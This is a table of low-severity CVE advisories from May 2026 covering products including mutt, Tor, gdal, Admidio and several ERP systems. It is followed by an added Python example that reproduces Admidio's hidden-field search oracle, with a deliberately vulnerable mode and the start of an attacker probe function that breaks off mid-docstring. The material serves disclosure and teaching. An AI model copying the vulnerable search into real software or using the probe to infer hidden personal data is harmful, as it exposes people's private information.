| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration vulnerability due to CSP header. This could allow attackers to inject malicious scripts increasing the risk of cross-site scripting (XSS) and potential exposure of sensitive information. | 2026-05-06 | 3.7 | CVE-2025-31983 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure "X-Content-Type-Options" header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. | 2026-05-06 | 3.7 | CVE-2025-31984 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by a Using Components with Known Vulnerabilities flaw where the application utilizes unpatched libraries or sub-components, which could allow an attacker to identify and exploit publicly known security vulnerabilities to gain unauthorized access or compromise the application. | 2026-05-06 | 3.7 | CVE-2025-59851 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insufficient Transport Layer Protection vulnerability where data is transmitted over the network without encryption, which could allow an attacker to compromise the confidentiality, integrity, and authentication of sensitive information. | 2026-05-06 | 3.7 | CVE-2025-59852 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Improper Error Handling vulnerability where the application exposes detailed stack traces in responses, which could allow an attacker to gain insights into the application's internal structure, code logic, and environment configurations. | 2026-05-06 | 3.1 | CVE-2025-59853 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability where the application utilizes the outdated X-XSS-Protection header, which could allow an attacker to exploit browser-specific rendering flaws or bypass security controls that should instead be managed by a robust Content Security Policy (CSP). | 2026-05-06 | 3.1 | CVE-2025-59854 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| Dell--PowerScale OneFS | Dell PowerScale OneFS versions 9.5.0.0 through 9.5.1.6, 9.6.0.0 through 9.7.1.13, 9.8.0.0 through 9.10.1.5 and 9.11.0.0 through 9.12.0.1 contain an Insufficient Logging vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information tampering. | 2026-05-08 | 3.3 | CVE-2026-32803 | https://www.dell.com/support/kbdoc/en-us/000461228/dsa-2026-172-security-update-for-dell-powerscale-onefs-insufficient-logging-vulnerability |
| kimai--kimai | Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0. | 2026-05-08 | 3.3 | CVE-2026-41498 | https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm https://github.com/kimai/kimai/releases/tag/2.54.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because SameSite=Lax cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. This issue has been patched in version 5.0.9. | 2026-05-07 | 3.5 | CVE-2026-41663 | https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| jgraph--drawio | draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's "Authorize in GitLab" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential phishing and session state token exfiltration. This issue has been patched in version 29.7.9. | 2026-05-08 | 3.4 | CVE-2026-42195 | https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x https://github.com/jgraph/drawio/issues/493 https://github.com/jgraph/drawio/releases/tag/v29.7.9 |
| mutt--mutt | mutt before 2.3.2 sometimes uses strfcpy instead of memcpy for the IMAP auth_cram MD5 digest. | 2026-05-04 | 3.7 | CVE-2026-43859 | https://github.com/muttmua/mutt/commit/834c5a2ed0479e51e8662a31caed129f136f4805 |
| mutt--mutt | mutt before 2.3.2 sometimes truncates the hash_passwd by one byte for IMAP auth_cram MD5 digest. | 2026-05-04 | 3.7 | CVE-2026-43860 | https://github.com/muttmua/mutt/commit/834c5a2ed0479e51e8662a31caed129f136f4805 |
| mutt--mutt | mutt before 2.3.2 does not check for '\0' in url_pct_decode. | 2026-05-04 | 3.7 | CVE-2026-43861 | https://github.com/muttmua/mutt/commit/12f54fe3b61f761c096fe95e95d5e3072af00ed2 |
| mutt--mutt | In mutt before 2.3.2, the imap_auth_gss security level is mishandled. | 2026-05-04 | 3.7 | CVE-2026-43862 | https://github.com/muttmua/mutt/commit/f547a849cdacb512800a5f477c27de217e1c8151 |
| mutt--mutt | mutt before 2.3.2 has an infinite loop in data_object_to_stream in crypt-gpgme.c. | 2026-05-04 | 3.7 | CVE-2026-43863 | https://github.com/muttmua/mutt/commit/fdc04a171777327218a1e78db504926c388b48c4 |
| Postfix--Postfix | Postfix before 3.8.16, 3.9 before 3.9.10, and 3.10 before 3.10.9 sometimes allows a buffer over-read and process crash via an enhanced status code that lacks text after the third number. | 2026-05-04 | 3.7 | CVE-2026-43964 | https://www.mail-archive.com/postfix-announce@postfix.org/msg00110.html |
| Paramiko--Paramiko | In Paramiko through 4.0.0 before a448945, rsakey.py allows the SHA-1 algorithm. | 2026-05-05 | 3.4 | CVE-2026-44405 | https://github.com/paramiko/paramiko/commit/a4489456b6f65281e172380cc4826cee5e851dbb https://ostif.org/wp-content/uploads/2026/05/25-11-2415-REP_paramiko-security-audit_v1.1.pdf |
| torproject--Tor | Tor before 0.4.9.7 has an out-of-bounds read when an END, a TRUNCATE, or a TRUNCATED cell lacks a reason in its payload, aka TROVE-2026-011. | 2026-05-07 | 3.7 | CVE-2026-44597 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41254 https://gitlab.torproject.org/tpo/core/tor/-/commit/8f98054b1982d00a14639864d03e9afd90b87481 |
| torproject--Tor | Tor before 0.4.9.7 can attempt or accept BEGIN_DIR via conflux legs, aka TROVE-2026-008. | 2026-05-07 | 3.7 | CVE-2026-44599 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41243 https://gitlab.torproject.org/tpo/core/tor/-/commit/50f90ba849088247734786922855c22661c6fa03 |
| torproject--Tor | Tor before 0.4.9.7 mishandles accounting of the conflux out-of-order queue during the clearing of a queue, aka TROVE-2026-010. | 2026-05-07 | 3.7 | CVE-2026-44600 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41251 https://gitlab.torproject.org/tpo/core/tor/-/commit/a198185ed863677d60eec120126730628dac35bb |
| torproject--Tor | Tor before 0.4.9.7, when circuit queue memory pressure exists, can experience a client crash because of a double close of a circuit, aka TROVE-2026-009. | 2026-05-07 | 3.7 | CVE-2026-44601 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41237 https://gitlab.torproject.org/tpo/core/tor/-/commit/d4e3f6a440b58c2be661decf20c09548704907dc |
| torproject--Tor | Tor before 0.4.9.7 has a NULL pointer dereference when a CERT cell is received out of order, aka TROVE-2026-006. | 2026-05-07 | 3.7 | CVE-2026-44602 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41240 https://gitlab.torproject.org/tpo/core/tor/-/commit/df7d5174ef41814d806c8ede776e230cd30ac12b |
| torproject--Tor | Tor before 0.4.9.7 has an out-of-bounds read by one byte via a malformed BEGIN cell, aka TROVE-2026-007. | 2026-05-07 | 3.7 | CVE-2026-44603 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41245 https://gitlab.torproject.org/tpo/core/tor/-/commit/1703df3d439c83c2184e259fad1cfa19240f9c89 |
| OpenStack--Ironic | In OpenStack Ironic through 35.x, instance_info['ks_template'] is rendered without sandboxing. | 2026-05-08 | 3 | CVE-2026-44916 | https://bugs.launchpad.net/ironic/+bug/2148307 |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. Prior to version 2026.29, users with "User Admin" permissions can change the email addresses of users with "Superuser" permissions. If the SysReptor installation has the "Forgot Password" functionality enabled (non-default), they can reset the Superusers' passwords and authenticate, if the Superuser has no MFA enabled. User managers can then access the Django backend (/admin) or manipulate the settings of the SysReptor installation. Note that user managers have the ability to access all pentest projects by assigning themselves "Project Admin" permissions. This is intentional and by design. This issue has been patched in version 2026.29. | 2026-05-08 | 3.8 | CVE-2026-44987 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-6x8f-v3cf-cvr3 https://github.com/Syslifters/sysreptor/releases/tag/2026.29 |
| justdan96--tsMuxer | A weakness has been identified in justdan96 tsMuxer up to 2.7.0. This vulnerability affects the function HevcVpsUnit::setFPS of the file /AFLplusplus/tsMuxer_prev/tsMuxer/hevc.cpp. Manipulation of the argument track_id causes a denial of service. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-04 | 3.3 | CVE-2026-7739 | VDB-360914 (justdan96 tsMuxer hevc.cpp setFPS denial of service); CTI Indicators (IOB, IOC, IOA); Submit #807647 (tsMuxer git-7f8667d crash); https://github.com/justdan96/tsMuxer/issues/895 https://github.com/user-attachments/files/16812270/poc1.zip https://github.com/justdan96/tsMuxer/ |
| justdan96--tsMuxer | A security vulnerability has been detected in justdan96 tsMuxer up to 2.7.0. This issue affects the function VvcVpsUnit::setFPS of the file tsMuxer/vvc.cpp. Manipulation of the argument track_id leads to a denial of service. The attack has to be carried out locally. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-04 | 3.3 | CVE-2026-7740 | VDB-360915 (justdan96 tsMuxer vvc.cpp setFPS denial of service); CTI Indicators (IOB, IOC, IOA); Submit #807651 (tsMuxer git-7f8667d crash); https://github.com/justdan96/tsMuxer/issues/899 https://github.com/user-attachments/files/16812319/poc5.zip https://github.com/justdan96/tsMuxer/ |
| FlowiseAI--Flowise | A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely but is of high complexity, and exploitability is considered difficult. Upgrading the affected component is recommended. | 2026-05-06 | 3.7 | CVE-2026-8026 | VDB-361273 (FlowiseAI Flowise API Response account.service.ts login information disclosure); CTI Indicators (IOB, IOC, TTP, IOA); Submit #777656 (FlowiseAI Flowise <= 3.0.12 Exposure of Sensitive Information (CWE-200)); https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91 |
| FlowiseAI--Flowise | A vulnerability was detected in FlowiseAI Flowise up to 3.0.12. This affects the function verify of the file packages/server/src/enterprise/services/account.service.ts of the component Endpoint. The manipulation results in information disclosure. Remote exploitation is possible but of high complexity, and exploitability is considered difficult. The exploit is now public and may be used. Upgrading the affected component is recommended. | 2026-05-06 | 3.7 | CVE-2026-8028 | VDB-361276 (FlowiseAI Flowise Endpoint account.service.ts verify information disclosure); CTI Indicators (IOB, IOC, TTP, IOA); Submit #777659 (FlowiseAI Flowise <= 3.0.12 Exposure of Sensitive Information (CWE-200)); https://gist.github.com/YLChen-007/1d52497b0221835f99367be61612746b |
| OSGeo--gdal | A vulnerability was determined in OSGeo gdal up to 3.13.0dev-4. This vulnerability affects the function memmove of the file frmts/hdf4/hdf-eos/SWapi.c of the component HDF-EOS Grid File Handler. The manipulation causes an out-of-bounds read. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.13.0RC1 resolves this issue; the fix is commit a791f70f8eaec540974ec989ca6fb00266b7646c. | 2026-05-07 | 3.3 | CVE-2026-8084 | VDB-361838 (OSGeo gdal HDF-EOS Grid File SWapi.c memmove out-of-bounds); CTI Indicators (IOB, IOC, IOA); Submit #808034 (OSGeo GDAL 3.13.0dev Out-of-Bounds Read); https://github.com/biniamf/pocs/tree/main/gdal_swfinfo_dimlist_oob-rw https://github.com/OSGeo/gdal/issues/14378 https://github.com/biniamf/pocs/blob/main/gdal_swfinfo_dimlist_oob-rw https://github.com/OSGeo/gdal/commit/a791f70f8eaec540974ec989ca6fb00266b7646c https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A weakness has been identified in OSGeo gdal up to 3.13.0dev-4. The affected element is the function GDfieldinfo of the file frmts/hdf4/hdf-eos/GDapi.c. The manipulation can lead to an out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. Upgrading to version 3.13.0RC1 fixes this issue; the fix is commit a791f70f8eaec540974ec989ca6fb00266b7646c. | 2026-05-07 | 3.3 | CVE-2026-8088 | VDB-361841 (OSGeo gdal GDapi.c GDfieldinfo out-of-bounds); CTI Indicators (IOB, IOC, IOA); Submit #808040 (OSGeo GDAL 3.13.0dev Out-of-Bounds Read); https://github.com/OSGeo/gdal/issues/14379 https://github.com/biniamf/pocs/tree/main/gdal-gdapi-gdfinfo-dimlist-oob-read https://github.com/OSGeo/gdal/commit/a791f70f8eaec540974ec989ca6fb00266b7646c https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. Impacted is the function ogs_sbi_stream_find_by_id in the library /lib/sbi/nghttp2-server.c of the component NSSF. The manipulation results in a denial of service. The attack requires local access. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 3.3 | CVE-2026-8119 | VDB-361906 (Open5GS NSSF nghttp2-server.c ogs_sbi_stream_find_by_id denial of service); CTI Indicators (IOB, IOC, IOA); Submit #808420 (Open5gs NSSF v2.7.7 Denial of Service); https://github.com/open5gs/open5gs/issues/4431 https://github.com/open5gs/open5gs/ |
| n/a--GPAC | A security vulnerability has been detected in GPAC up to 26.02.0. This affects the function sidx_box_read of the file src/isomedia/box_code_base.c. The manipulation leads to uncontrolled resource allocation (denial of service). The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The identifier of the patch is 442e2299530138d8f874fd885c565ba98a6318ba. Installing the patch is recommended. | 2026-05-08 | 3.3 | CVE-2026-8124 | VDB-361914 (GPAC box_code_base.c sidx_box_read allocation of resources); CTI Indicators (IOB, IOC, IOA); Submit #808611 (gpac latest Denial of Service (DoS)); https://github.com/gpac/gpac/issues/3519 https://github.com/gpac/gpac/commit/442e2299530138d8f874fd885c565ba98a6318ba https://github.com/gpac/gpac/ |
| n/a--JeecgBoot | A flaw has been found in JeecgBoot 3.9.1. The impacted element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/LoginController.java of the component mLogin Endpoint. The manipulation causes an authorization bypass. The attack can be carried out remotely but is of high complexity, and exploitability is regarded as difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 3.7 | CVE-2026-8196 | VDB-362348 (JeecgBoot mLogin Endpoint LoginController.java authorization); CTI Indicators (IOB, IOC, IOA); Submit #803529 (jeecgboot JeecgBoot 3.9.1 Authorization Bypass); https://github.com/xpp3901/CVE_APPLY/tree/main/V-009_mLogin_Captcha_Bypass |
| Dotouch--XproUPF | A vulnerability was found in Dotouch XproUPF 2.0.0-release-088aa7c4. This impacts the function vlib_worker_loop in the library /usr/xpro/upf/tools/libs/libvlib.so of the component UPF Process. The manipulation results in a denial of service. The vendor was contacted early about this disclosure. | 2026-05-10 | 3.5 | CVE-2026-8232 | VDB-362449 (Dotouch XproUPF UPF Process libvlib.so vlib_worker_loop denial of service); CTI Indicators (IOB, IOC, IOA); Submit #808794 (Dotouch XproUPF v2.0.0-release-088aa7c4 Denial of Service) |
| Industrial Application Software IAS--Canias ERP | A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. The impacted element is the function doAction of the component Login RMI Interface. The manipulation results in an observable response discrepancy. The attack can be carried out remotely but is of high complexity, and exploitability is regarded as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 3.7 | CVE-2026-8242 | VDB-362458 (Industrial Application Software IAS Canias ERP Login RMI doAction response discrepancy); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808295 (Industrial Application Software - IAS Canias ERP 8.03-- Observable Response Discrepancy (CWE-204)); https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/85422a63c10a001c75a22365457de624 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a Cross-Site Request Forgery (CSRF) vulnerability. This could lead to unauthorized changes or exposure of sensitive data. | 2026-05-06 | 2.6 | CVE-2025-31957 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by an information disclosure issue in which the server banner is exposed. Exposed server banners may reveal software versions and system details, potentially aiding attackers in targeting known vulnerabilities. | 2026-05-06 | 2.6 | CVE-2025-31975 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix RunBookAI | HCL BigFix RunBookAI is affected by a "Continued availability of less-secure Input Text" vulnerability: a component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors. | 2026-05-06 | 2.7 | CVE-2025-62345 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130444 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the member assignment DataTables endpoint (members_assignment_data.php) includes hidden profile fields (BIRTHDAY, STREET, CITY, POSTCODE, COUNTRY) in its SQL search condition regardless of field visibility settings. While the JSON output correctly suppresses hidden columns via isVisible() checks, the server-side search operates at the SQL level before any visibility filtering. This allows a role leader with assign-only permissions to infer hidden PII values by observing which users appear in search results for specific values. This issue has been patched in version 5.0.9. | 2026-05-07 | 2.7 | CVE-2026-41659 | https://github.com/Admidio/admidio/security/advisories/GHSA-68pr-7prh-mpv4 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a time-of-check-time-of-use vulnerability in the validateScriptFileForShellBleed function that allows local attackers to bypass workspace boundary checks. An attacker with workspace write access can race-condition swap the target file between validation and preflight read, causing the validator to inspect a different file identity than the one that passed the initial boundary check. | 2026-05-05 | 2.5 | CVE-2026-43529 | GitHub Security Advisory GHSA-gj9q-8w99-mp8j; Patch Commit; VulnCheck Advisory: OpenClaw < 2026.4.10 - Time-of-Check-Time-of-Use (TOCTOU) Race Condition in exec Script Preflight Validator |
| mutt--mutt | mutt before 2.3.2 has a show_sig_summary NULL pointer dereference. | 2026-05-04 | 2.5 | CVE-2026-43864 | https://github.com/muttmua/mutt/commit/ebfa2969042d89303d15334193fcc32866c8a8df |
| uriparser--uriparser | In uriparser before 1.0.2, there is pointer difference truncation to int in various places. | 2026-05-08 | 2.9 | CVE-2026-44927 | https://github.com/uriparser/uriparser/pull/304 |
| uriparser--uriparser | In uriparser before 1.0.2, the function family EqualsUri can misclassify two unequal URIs as equal. | 2026-05-08 | 2.9 | CVE-2026-44928 | https://github.com/uriparser/uriparser/pull/305 |
| GrapheneOS--GrapheneOS | GrapheneOS before 2026050400 allows attackers to discover the real IP address of a VPN user as a consequence of a registerQuicConnectionClosePayload optimization, because an application can let system_server transmit UDP traffic on its behalf. This occurs when the "Block connections without VPN" and "Always-on VPN" settings are enabled. | 2026-05-09 | 2.2 | CVE-2026-45182 | https://lowlevel.fun/posts/tiny-udp-cannon-android-vpn-bypass/ https://grapheneos.org/releases#2026050400 https://cyberinsider.com/grapheneos-fixes-android-vpn-leak-google-refused-to-patch/ |
| libexpat project--libexpat | In libexpat before 2.8.1, the computational complexity of attribute name collision checks allows a denial of service via moderately sized crafted XML input. | 2026-05-10 | 2.9 | CVE-2026-45186 | https://github.com/libexpat/libexpat/pull/1216 |
| chatchat-space--Langchain-Chatchat | A flaw has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. This issue affects the function PIL.Image.tobytes of the file libs/chatchat-server/chatchat/webui_pages/dialogue/dialogue.py of the component Vision Chat Paste Image Handler. Manipulation of the argument paste_image.image_data causes use of a weak hash. The attacker needs to be present on the local network. The attack is of high complexity, and exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7845 | VDB-361124 (chatchat-space Langchain-Chatchat Vision Chat Paste Image dialogue.py PIL.Image.tobytes weak hash); CTI Indicators (IOB, IOC, TTP, IOA); Submit #807794 (chatchat-space Langchain-Chatchat 0.3.1.3 Weak Hash / CWE-328); https://github.com/chatchat-space/Langchain-Chatchat/issues/5462 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-1-tobytes-Hash-Collision.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| chatchat-space--Langchain-Chatchat | A vulnerability has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. Impacted is the function files of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component OpenAI-Compatible File Upload API. Manipulation of the argument file.filename leads to a time-of-check time-of-use race. Access to the local network is required for this attack to succeed. The attack is of high complexity, and exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7846 | VDB-361125 (chatchat-space Langchain-Chatchat OpenAI-Compatible File Upload API openai_routes.py files toctou); CTI Indicators (IOB, IOC, IOA); Submit #807795 (chatchat-space Langchain-Chatchat 0.3.1.3 TOCTOU Race Condition / CWE-367); https://github.com/chatchat-space/Langchain-Chatchat/issues/5463 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-2-Silent-File-Overwrite.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| chatchat-space--Langchain-Chatchat | A vulnerability was found in chatchat-space Langchain-Chatchat up to 0.3.1.3. The affected element is the function _get_file_id of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Uploaded File Handler. The manipulation results in use of insufficiently random values. Access to the local network is required for this attack. The attack is of high complexity, and exploitability is described as difficult. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7847 | VDB-361126 (chatchat-space Langchain-Chatchat Uploaded File openai_routes.py _get_file_id random values); CTI Indicators (IOB, IOC, TTP, IOA); Submit #807796 (chatchat-space Langchain-Chatchat 0.3.1.3 Use of Insufficiently Random Values / CWE-330); https://github.com/chatchat-space/Langchain-Chatchat/issues/5464 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-3-Predictable-File-ID.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| SourceCodester--Pharmacy Sales and Inventory System | A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects an unknown part of the file /index.php?page=users. Manipulation of the argument Name can lead to cross-site scripting. The attack may be launched remotely. The exploit has been published and may be used. | 2026-05-08 | 2.4 | CVE-2026-8136 | VDB-361925 (SourceCodester Pharmacy Sales and Inventory System index.php users cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808839 (SourceCodester Pharmacy Sales and Inventory System V1.0 cross site scripting); https://github.com/timeflies123/cve/issues/1 https://www.sourcecodester.com/ |
| Devs Palace--ERP Online | A weakness has been identified in Devs Palace ERP Online up to 4.0.0. The affected element is an unknown function of the file /inventory/purchase_return_save. The manipulation can lead to cross-site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8218 | VDB-362435 (Devs Palace ERP Online purchase_return_save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808252 (Devs Palace ERP Online 4.0.0 Code Injection); Submit #808259 (Devs Palace ERP Online 4.0.0 Code Injection in "inventory/purchase_return_save", duplicate); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A security vulnerability has been detected in Devs Palace ERP Online up to 4.0.0. The impacted element is an unknown function of the file /inventory/supplier-save. The manipulation leads to cross-site scripting. Remote exploitation is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8219 | VDB-362436 (Devs Palace ERP Online supplier-save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808257 (Devs Palace ERP Online 4.0.0 Code Injection in "/inventory/supplier-save"); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A vulnerability was detected in Devs Palace ERP Online up to 4.0.0. This affects an unknown function of the file /inventory/customer-save. The manipulation results in cross-site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8220 | VDB-362437 (Devs Palace ERP Online customer-save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808261 (Devs Palace ERP Online 4.0.0 Code Injection in "inventory/customer-save"); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A flaw has been found in Devs Palace ERP Online up to 4.0.0. This impacts an unknown function of the file /inventory/item-save. The manipulation causes cross-site scripting. The attack can be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8221 | VDB-362438 (Devs Palace ERP Online item-save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808263 (Devs Palace ERP Online 4.0.0 Code Injection in "inventory/item-save"); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A vulnerability was identified in Devs Palace ERP Online up to 4.0.0. Affected by this vulnerability is an unknown function of the file /inventory/purchase_save. The manipulation leads to cross-site scripting. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8253 | VDB-362550 (Devs Palace ERP Online purchase_save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808277 (Devs Palace ERP Online 4.0.0 Code Injection); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A security flaw has been discovered in Devs Palace ERP Online up to 4.0.0. Affected by this issue is an unknown function of the file /inventory/sales_save. The manipulation results in cross-site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8254 | VDB-362551 (Devs Palace ERP Online sales_save cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #808279 (Devs Palace ERP Online 4.0.0 Code Injection); https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
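
The Admidio entry above (CVE-2026-41659) describes a search oracle: the WHERE clause of the member-assignment search covers hidden profile fields, while the JSON output hides them. The following is an added example, not Admidio code, that models that flaw with an in-memory SQLite table. The table layout, the field names beyond those the entry lists (last_name, first_name), the two sample members and the role model are constructed for this illustration.

```python
import sqlite3
from typing import Dict, List, Optional

# Added example, not Admidio code: the search condition is built over every
# profile field, but the output only emits fields the caller may see, so an
# assign-only role leader can probe hidden PII by watching who matches.

ALL_FIELDS = ["last_name", "first_name", "birthday", "street", "city", "postcode", "country"]
HIDDEN_FIELDS = {"birthday", "street", "city", "postcode", "country"}

# Constructed sample members.
SAMPLE_MEMBERS = [
    ("Smith", "Alice", "1990-04-12", "1 Elm St", "Springfield", "12345", "US"),
    ("Jones", "Bob", "1985-11-30", "9 Oak Ave", "Shelbyville", "54321", "US"),
]


def _open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members(%s)" % ", ".join(ALL_FIELDS))
    con.executemany("INSERT INTO members VALUES (?,?,?,?,?,?,?)", SAMPLE_MEMBERS)
    return con


def visible_fields(can_see_pii: bool) -> List[str]:
    """Fields the caller is allowed to see; an assign-only leader gets no PII."""
    return ALL_FIELDS if can_see_pii else [f for f in ALL_FIELDS if f not in HIDDEN_FIELDS]


def search_members(term: str, can_see_pii: bool, vulnerable: bool) -> List[Dict[str, str]]:
    """Server-side search. With vulnerable=True the WHERE clause spans every
    field (the flaw); with vulnerable=False it is limited to the visible ones.
    Column names come from a fixed list, never from the request, so splicing
    them into the SQL text is safe; the search term itself is bound."""
    shown = visible_fields(can_see_pii)
    searchable = ALL_FIELDS if vulnerable else shown
    where = " OR ".join("%s LIKE ?" % f for f in searchable)
    params = ["%" + term + "%"] * len(searchable)
    con = _open_db()
    sql = "SELECT %s FROM members WHERE %s" % (", ".join(shown), where)
    rows = con.execute(sql, params).fetchall()
    con.close()
    return [dict(zip(shown, row)) for row in rows]


def probe_hidden_value(target_first_name: str, candidates: List[str]) -> Optional[str]:
    """What an assign-only leader can do against the vulnerable endpoint: try
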